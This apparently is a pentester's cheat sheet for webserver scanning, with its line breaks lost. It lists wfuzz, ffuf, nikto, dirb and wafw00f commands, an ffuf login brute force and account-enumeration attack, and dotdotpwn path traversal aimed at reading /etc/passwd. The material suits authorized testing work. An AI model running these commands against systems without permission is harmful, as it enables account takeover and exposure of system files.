Webserver scanning
Last updated
-x 'asp, aspx, html, txt'-x 'php, cgi, jsp, html, txt'wfuzz -w <wordlist-file> —-hc 404 <host>/FUZZ/FUZ2Zwfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --sh BBB <host>/file.php?param=FUZZffuf -w <wordlist-file> -X POST -d "email=FUZZ&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -mr "email already exists"ffuf -w emails.txt:W1,<password-file>:W2 -X POST -d "email=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u <url> -fc 200nikto -h <ip> -Format txt -o .dotdotpwn -m http -h <ip> -f <file>dotdotpwn -m http-url -u http://<ip>/nav.php?page=TRAVERSAL -o unix -s -d 4 -k "root:" -f /etc/passwddirb <host> -o dirbdirbusterwafw00f <url>